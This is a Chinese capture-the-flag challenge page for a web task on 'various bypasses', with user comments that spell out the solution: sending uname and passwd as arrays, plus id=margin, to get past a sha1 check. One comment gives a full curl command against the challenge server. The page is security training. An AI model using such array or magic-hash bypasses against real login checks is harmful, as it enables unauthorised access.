各种绕过哟WEB 未解决

分数: 30 金币: 3
题目作者: harry
一  血: jiangdie666
一血奖励: 2金币
解  决: 4404
提  示:
描  述:
各种绕过
评论
zxcvbnmzhang 6天前

curl -X POST "http://117.72.52.127:16987/?uname[]=a&id=margin" -d "passwd[]=b"

回复 0

asddddd 18天前

我用0e绕过sha1为啥不行,为什么只能数组绕过

回复 0

一个姓⎝李⎠的师傅~ 29天前

题目挺好,各种细节和基础知识的考验,基础知识恶补: https://www.yuque.com/u21437924/ap9vtm/gqkc3dcfmfpe5p85?singleDoc#VbWHy

回复 0

ubudj 1月前

?uname[]=1&id=margin POST: passwd[]=2

回复 0

zhenhui 1月前

GET: ?uname[]=1&id=margin POST: passwd[]=2

回复 0

wywsssf 1月前

链接后面加?uname[]=1&id=margin,同时POST中passwd[]=2

回复 0

ctfer-pls 2月前

GET:id=margin&uname[]=111a POST:passwd[]=2bba

回复 0

2686213396 2月前

flag{*********}

回复 0

2686213396 2月前

我喜欢hackbar这个插件(POST方法的最优选择),相当于帮你写好请求头格式的bp,只需要填写上传的参数即可,本题思路,直接url传参uname和id,通过数组实现绕过,再由hackbarPOSTpasswd的参数,获得flag,这道题目的核心依旧是代码审计

回复 0

iNMB 2月前

很奇怪bp不行,用其他方法可以不知道为什么

回复 1

WriteUp

image
harry

3 金币

评分(4)

解题动态

ChangQing 攻破了该题 37分钟前
17361232956 攻破了该题 1小时前
xiemeimei 攻破了该题 5小时前
207439410 攻破了该题 7小时前
Fenix 攻破了该题 11小时前
932041046 攻破了该题 11小时前
orange2015 攻破了该题 21小时前
hanzkj 攻破了该题 23小时前
2970507147 攻破了该题 1天前
zcgzcx1234 攻破了该题 1天前
2757547892 攻破了该题 1天前
zzy1223 攻破了该题 2天前
欲语泪先流 攻破了该题 2天前
walkerming 攻破了该题 2天前
吴王饭差 攻破了该题 3天前
huangyujie 攻破了该题 3天前
1234567nxb 攻破了该题 3天前
krkrdkdk 攻破了该题 3天前
派大星CTF 攻破了该题 3天前
暗A166668 攻破了该题 4天前
问题反馈